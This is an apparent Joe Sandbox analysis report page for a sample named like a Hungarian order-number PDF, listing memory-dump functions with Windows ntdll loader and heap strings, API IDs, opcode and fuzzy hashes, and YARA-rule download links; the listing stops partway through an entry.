                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                              • API String ID: 3446177414-3492000579
                                              • Opcode ID: c8ca0fbd915e6c7e2b085eece1bb4031c018700d4107f068755991aff6d143e7
                                              • Instruction ID: 17c6696d74b7390c3a11e39984e20a87e5d0f5cd9f0ffdf44232746dc383d350
                                              • Opcode Fuzzy Hash: c8ca0fbd915e6c7e2b085eece1bb4031c018700d4107f068755991aff6d143e7
                                              • Instruction Fuzzy Hash: 9C711E71909744EFEB06CF68D0416ADFBF6BF8A310F48815AE445AB642CB309981CF44
                                              Function 335565B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 335B9AF6
                                              • LdrpLoadShimEngine, xrefs: 335B9ABB, 335B9AFC
                                              • minkernel\ntdll\ldrinit.c, xrefs: 335B9AC5, 335B9B06
                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 335B9AB4
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-3589223738
                                              • Opcode ID: 12301f2ef71c748277bd7481dd10697bdf6007613e8ae03799aa259d8a66a484
                                              • Instruction ID: a2627156479ad6cac940e2f6ce4a3fbef7d131f36ab861d9b25c4bfc678cef69
                                              • Opcode Fuzzy Hash: 12301f2ef71c748277bd7481dd10697bdf6007613e8ae03799aa259d8a66a484
                                              • Instruction Fuzzy Hash: 68512676A12358AFEB04DB68DC58B9DB7F5BB80314F44116AF451BF299CB70AC41CB90
                                              Function 33589803 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 179timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: @3e3$LdrpUnloadNode$Unmapping DLL "%wZ"$dfe3@3e3@3e3$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 3446177414-1435353046
                                              • Opcode ID: 718b04ea47f2a25b95277dac0504b6d606657d15d4f04b5f3ac31ece4b44250c
                                              • Instruction ID: 6329c0e3f6d6a9bc044db4dc3df71fdff527a3d38876c5de60a532b860221f18
                                              • Opcode Fuzzy Hash: 718b04ea47f2a25b95277dac0504b6d606657d15d4f04b5f3ac31ece4b44250c
                                              • Instruction Fuzzy Hash: 0951D371B017029FE714DF24E884B19B7F5BFC4224F580A6DE8959FA91DB70A845CF82
                                              Function 335AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                              • Instruction ID: 3b632661fc2a98e660b9868f8718b70e135138527f67c2e1397440684a0c6b93
                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                              • Instruction Fuzzy Hash: 2F81F5B8E253498EEF06CF6CE8507EEBBB1AF45351F584619D861A7391C7708840EBD0
                                              Function 33569126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$@
                                              • API String ID: 3446177414-1194432280
                                              • Opcode ID: caabfe0f64c9663ffe4d7c38dad4ca617e9f66fad14e8ccba04fb89f1b63b17f
                                              • Instruction ID: 7b623d2b3caa59ef0622dfed04de6615caa5a09b6f12d98f705ce78b5ef32387
                                              • Opcode Fuzzy Hash: caabfe0f64c9663ffe4d7c38dad4ca617e9f66fad14e8ccba04fb89f1b63b17f
                                              • Instruction Fuzzy Hash: 44814CB5D002699BDB21CF94DC44BDEB7B8AF48754F4041EAE909B7690E7309E85CFA0
                                              Function 33594D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 335D3640, 335D366C
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 335D365C
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 335D362F
                                              • LdrpFindDllActivationContext, xrefs: 335D3636, 335D3662
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 3446177414-3779518884
                                              • Opcode ID: 24177f9bc69433fcb45f6b93bbfc6dd92ab6acd35f2a1b3e673f6f1657869e77
                                              • Instruction ID: 5a01c2f8928ff5aa0a1e8ea21758c88889e3bc373729e24293291d4a186e8bdc
                                              • Opcode Fuzzy Hash: 24177f9bc69433fcb45f6b93bbfc6dd92ab6acd35f2a1b3e673f6f1657869e77
                                              • Instruction Fuzzy Hash: 02313CFE901352AEFB11EB04F848BD673E8AB01796F4F4165E44467261DBA09CC08BC5
                                              Function 3358245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              • TGS3, xrefs: 33582462
                                              • LdrpDynamicShimModule, xrefs: 335CA998
                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 335CA992
                                              • minkernel\ntdll\ldrinit.c, xrefs: 335CA9A2
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGS3$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-728310336
                                              • Opcode ID: 16b0db4068e8b72588649eae72f3902642302902d899b1cc7b322a48527d8b3b
                                              • Instruction ID: c0fd53f09f972f94eb63d09551aeb0a5f784556c6ed732d22e9ad62effdb5a83
                                              • Opcode Fuzzy Hash: 16b0db4068e8b72588649eae72f3902642302902d899b1cc7b322a48527d8b3b
                                              • Instruction Fuzzy Hash: 63312A75A00341BFF715EF98E845A5ABFF8EBC4B58F650069E8107B255C7B09982CB90
                                              Function 336120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$[$]:%u
                                              • API String ID: 48624451-2819853543
                                              • Opcode ID: e0cb9ce12d0119cbbbaf2050d2b7d8981d2461dee70064abd1911f03c04eba97
                                              • Instruction ID: ae8cf03205c283e253f48a97029c6d58abb05b61b9692924a2925ce3cd074e10
                                              • Opcode Fuzzy Hash: e0cb9ce12d0119cbbbaf2050d2b7d8981d2461dee70064abd1911f03c04eba97
                                              • Instruction Fuzzy Hash: 4D2177B6D00219AFDB41DF79DD41AEE7BF8EF54780F840116EA05E3600E730DA118BA1
                                              Function 3355F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3610490719
                                              • Opcode ID: bb7a1d91819ea7fbf3c4a9c940a0346785604ea30d7926d22c7e65b48a2e5048
                                              • Instruction ID: 70de84a7b0f31018abd47a34cc617bc26e879b6268a92583c3dcab2cb851081b
                                              • Opcode Fuzzy Hash: bb7a1d91819ea7fbf3c4a9c940a0346785604ea30d7926d22c7e65b48a2e5048
                                              • Instruction Fuzzy Hash: 65910675A04B41DFF716CB24E844B2AB7B9BF84A40F48065AF942DB691DB34F841CB92
                                              Function 33580BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Failed to allocated memory for shimmed module list, xrefs: 335CA10F
                                              • LdrpCheckModule, xrefs: 335CA117
                                              • minkernel\ntdll\ldrinit.c, xrefs: 335CA121
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-161242083
                                              • Opcode ID: 71b91a9f3bb86313c008d4829e74701a33ecc0186f9ed524368a90b8b3a2e2b8
                                              • Instruction ID: 094627493bc24f9a2d682c21649b1b598a4f1f5f7eb11582185a0cfc04460c37
                                              • Opcode Fuzzy Hash: 71b91a9f3bb86313c008d4829e74701a33ecc0186f9ed524368a90b8b3a2e2b8
                                              • Instruction Fuzzy Hash: 6F71C175E00345EFEB04DFA8E984AAEFBF4EB84348F584469D441EB650E738AD42CB50
                                              Function 3359C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Failed to reallocate the system dirs string !, xrefs: 335D82D7
                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 335D82DE
                                              • minkernel\ntdll\ldrinit.c, xrefs: 335D82E8
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1783798831
                                              • Opcode ID: ee6d6f75067b9ed9749b488604d3ab7a9e30f47c8a005d14060395b9105a3210
                                              • Instruction ID: e5de2f8228d54fbf8293a95a65719c2dc2a257a8c54d2ab374e08a521c8d0481
                                              • Opcode Fuzzy Hash: ee6d6f75067b9ed9749b488604d3ab7a9e30f47c8a005d14060395b9105a3210
                                              • Instruction Fuzzy Hash: 3D41C2B5916300AFE710EB64EC44B8B77F8EF856A0F44493AF948E7650E774E801CB92
                                              Function 3359BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 335D7BAC
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 335D7B7F
                                              • RTL: Resource at %p, xrefs: 335D7B8E
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              • Opcode ID: 2be0048abf7a8081ed37aef4e4a264ed8477600d77d94bff9614f9be835cd8d9
                                              • Instruction ID: c86c04275bfb414785bb93de5f4a98a722d92ef778210eb9d2d92f723e75f5d2
                                              • Opcode Fuzzy Hash: 2be0048abf7a8081ed37aef4e4a264ed8477600d77d94bff9614f9be835cd8d9
                                              • Instruction Fuzzy Hash: 5841E1357057029FF714CE29E840B9AB7E5EF88750F500A1DF89ADB680EB71E8058B91
                                              Function 3359B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 335D728C
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 335D72C1
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 335D7294
                                              • RTL: Resource at %p, xrefs: 335D72A3
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              • Opcode ID: ee3ef7eb0b9470256f08b5af8bc7146a0796d065d69d112b36b23ee4c34c5cc7
                                              • Instruction ID: 4d3f9f850739561e94d180e2065d398aabcf275c6a749beec96f04e1eb237ee3
                                              • Opcode Fuzzy Hash: ee3ef7eb0b9470256f08b5af8bc7146a0796d065d69d112b36b23ee4c34c5cc7
                                              • Instruction Fuzzy Hash: 12411135A00342AFE710CE28EC41F9AB7B6FF84750F540A19F998EB640DB31E8169BD1
                                              Function 335E4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • LdrpCheckRedirection, xrefs: 335E488F
                                              • minkernel\ntdll\ldrredirect.c, xrefs: 335E4899
                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 335E4888
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                              • API String ID: 3446177414-3154609507
                                              • Opcode ID: ca036a109c738b62a77eaf9e8233719c599a443ae8b0491b59fcb05ca66077d6
                                              • Instruction ID: 67546c4fb51ed3aa83681de40a0aba438c8c84226cab3fa22c23d5ed8547ccbe
                                              • Opcode Fuzzy Hash: ca036a109c738b62a77eaf9e8233719c599a443ae8b0491b59fcb05ca66077d6
                                              • Instruction Fuzzy Hash: B841E2F6A093509FDB11CF28E840A967BE9AF8A792F060569EC94E7311D730DC81DBC1
                                              Function 33612300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: 3f927fe8733dd7d91b1936bd3b02138df8504c392379fb06ae14f6eb19c40fad
                                              • Instruction ID: 7e6b220a617f93ee09e964907c2057ad3ef02ac52aac06d87022095afd1c76be
                                              • Opcode Fuzzy Hash: 3f927fe8733dd7d91b1936bd3b02138df8504c392379fb06ae14f6eb19c40fad
                                              • Instruction Fuzzy Hash: 19318676E002199FDB10CF29DD40BEEB7F8EB44750F844596E84AE3240EB30EA558FA1
                                              Function 335E5F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Wow64 Emulation Layer
                                              • API String ID: 3446177414-921169906
                                              • Opcode ID: 5d00b8e054f094aa0f85c01f56c725a25b0171bf1ecdeca837d93ead4df62e0f
                                              • Instruction ID: dbad4f3ae14264dcc64f2f40ca5cea091ec872280d99d48da5fa77e990fcf1a1
                                              • Opcode Fuzzy Hash: 5d00b8e054f094aa0f85c01f56c725a25b0171bf1ecdeca837d93ead4df62e0f
                                              • Instruction Fuzzy Hash: AA212CB590121DBFAB01AFA0EC84DFF7BBDEF852D8B450464FA21A2100D730DE059B64
                                              Function 3358EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d74ed665cefb89a966fc5e7d56f0eba7ac28ba47dcc632d1d88137c0ce9429c7
                                              • Instruction ID: 1ea0dea65cfa156776375e9be16ebb371df21f4c0e3ad93fb84e9f08933b4bfb
                                              • Opcode Fuzzy Hash: d74ed665cefb89a966fc5e7d56f0eba7ac28ba47dcc632d1d88137c0ce9429c7
                                              • Instruction Fuzzy Hash: B3E1CD75E00748DFDB21CFA9E980A8DBBF5BF48354F244A2AE446EB660D770A941CF10
                                              Function 335DEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 9334a5aab3dbbb468b6ac7cd3795bcfefe1b4d86f4d3d4ac6dab9755b7b6da28
                                              • Instruction ID: c46a2377f83120153a106cb1ec18b3974105c9ee419f0dc3b5288ef7b1beef14
                                              • Opcode Fuzzy Hash: 9334a5aab3dbbb468b6ac7cd3795bcfefe1b4d86f4d3d4ac6dab9755b7b6da28
                                              • Instruction Fuzzy Hash: A3713471E0025ADFDF01CFA8E990ADDBBF5BF48350F58412AE905EB254D734A906CBA4
                                              Function 3363A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 507a0ed8384649aa2613f265068e62ca2f5e209c7753383c0a088c5b06580ab3
                                              • Instruction ID: 712a219b4d127983d52fc2fc698744fcd2b01c446af7f4061650549ee1e527e6
                                              • Opcode Fuzzy Hash: 507a0ed8384649aa2613f265068e62ca2f5e209c7753383c0a088c5b06580ab3
                                              • Instruction Fuzzy Hash: 1E518A787026129FEB08CE18C9A4A29B7F5FF8A370B14416DD906DB720DB70EC51EB81
                                              Function 335DF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 1d4dca69e3b5bb351c3ef17652a3cd693713bb9210e6a4d6fde5b12bff7434c7
                                              • Instruction ID: 489553da99fa56c6af91eeaa5e63b7a885fe41da80b6904e72d1b7c4fb36d204
                                              • Opcode Fuzzy Hash: 1d4dca69e3b5bb351c3ef17652a3cd693713bb9210e6a4d6fde5b12bff7434c7
